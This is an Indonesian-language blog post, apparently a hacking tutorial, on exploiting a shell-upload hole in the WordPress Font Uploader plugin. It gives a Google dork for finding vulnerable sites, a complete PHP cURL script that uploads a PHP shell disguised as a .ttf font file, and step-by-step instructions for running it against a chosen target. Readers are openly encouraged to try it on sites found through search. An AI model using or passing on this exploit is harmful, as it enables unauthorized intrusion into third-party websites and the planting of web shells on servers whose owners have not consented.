“Wordpress Font Uploader Shell Upload Vulnerability”, bisa
diartikan sebagai celah upload shell pada plugins Font Uploader di CMS
wordpress. Dengan memanfaatkan fungsi upload pada plugins tersebut, bisa
dimanfaatkan seorang attacker untuk mengupload shell dengan teknik exploitasi.
Gak
usah panjang lebar, coba dipraktekkan aja nanti disimpulkan sendiri. Hehehe.
Vulnerability
Apps: http://downloads.wordpress.org/plugin/font-uploader.1.2.4.zip
Siapkan
peralatannya dulu gan.
Dork
: inurl:/wp-content/plugins/font-uploader/
Pertama,
masukkan dorknya ke google untuk mencari target.
Cari
file font-upload.php pada folder wp-content/plugins/font-uploader/font-upload.php
seperti dibawah ini. Kalau ada, berarti vuln.
Salin
script exploit dibawah ini ke notepad
<?php
$uploadfile="lo.php.ttf";
$ch
=
curl_init("http://server/wordpress/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch,
CURLOPT_POST, true);
curl_setopt($ch,
CURLOPT_POSTFIELDS,
array('font'=>"@$uploadfile",
'Submit'=>'submit'));
curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult
= curl_exec($ch);
curl_close($ch);
print
"$postResult";
?>
Ganti
url target diatas dengan url web yang vuln.
Save
dengan nama hack.php
Sekarang
copy file shell (lo.php.ttf) dan hack.php ke c:/xampp/php seperti gambar
dibawah ini.
Klik
Start , All Programs, Accessories, klik Command Promt.
Kemudian
muncul jendela command promt seperti dibawah ini. Lalu ketik perintah cd..
kemudian tekan enter.
Ketik
lagi cd.. kemudian tekan enter
Sekarang
ketik cd xampp kemudian tekan enter
Lalu
ketik cd php kemudian tekan enter
Terakhir
ketik php hack.php seperti gambar dibawah ini, kemudian tekan enter
Shell
Access :
contoh
seperti dibawah ini.
Hasilnya
:
Postingan
0 komentar:
Posting Komentar